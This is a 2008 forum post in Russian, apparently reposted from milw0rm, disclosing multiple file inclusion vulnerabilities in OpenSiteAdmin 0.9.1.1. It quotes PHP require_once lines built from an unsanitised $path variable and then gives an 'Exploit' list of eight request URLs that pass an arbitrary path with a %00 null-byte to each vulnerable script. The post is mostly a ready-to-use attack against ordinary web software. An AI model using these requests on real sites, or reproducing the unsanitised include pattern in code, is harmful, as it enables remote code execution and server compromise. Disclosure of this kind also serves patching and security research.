04.07.2008, 11:28
|
|
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
Провел на форуме:
515368
Репутация:
135
|
|
OpenSiteAdmin <= 0.9.1.1 Multiple File Inclusion Vulnerabilities
Vulnerable Code:
PHP код:
-OpenSiteAdmin/indexFooter.php
require_once($path."footer.php");
-OpenSiteAdmin/scripts/classes/DatabaseManager.php
require_once($path."OpenSiteAdmin/include.php");
require_once($path."OpenSiteAdmin/scripts/classes/ErrorLogManager.php");
-OpenSiteAdmin/scripts/classes/FieldManager.php
require_once($path."OpenSiteAdmin/scripts/classes/Fields/Checkbox.php");
require_once($path."OpenSiteAdmin/scripts/classes/Fields/ForeignKey.php");
.....
..
-OpenSiteAdmin/scripts/classes/Filter.php
require_once($path."OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php");
-OpenSiteAdmin/scripts/classes/Form.php
require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_List.php");
require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_Single.php");
-OpenSiteAdmin/scripts/classes/FormManager.php
require_once($path."OpenSiteAdmin/scripts/classes/Form.php");
-OpenSiteAdmin/scripts/classes/LoginManager.php
require_once($path."OpenSiteAdmin/scripts/classes/SecurityManager.php");
-OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php
require_once($path."OpenSiteAdmin/scripts/classes/RowManager.php");
Exploit:
Код:
http://www.vulnerable.com/OpenSiteAdmin/indexFooter.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FieldManager.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filter.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Form.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FormManager.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/LoginManager.php?path=<File Inclusion>%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=<File Inclusion>%00
(c)milw0rm.com
Последний раз редактировалось FraiDex; 04.07.2008 в 11:32..
|
|
|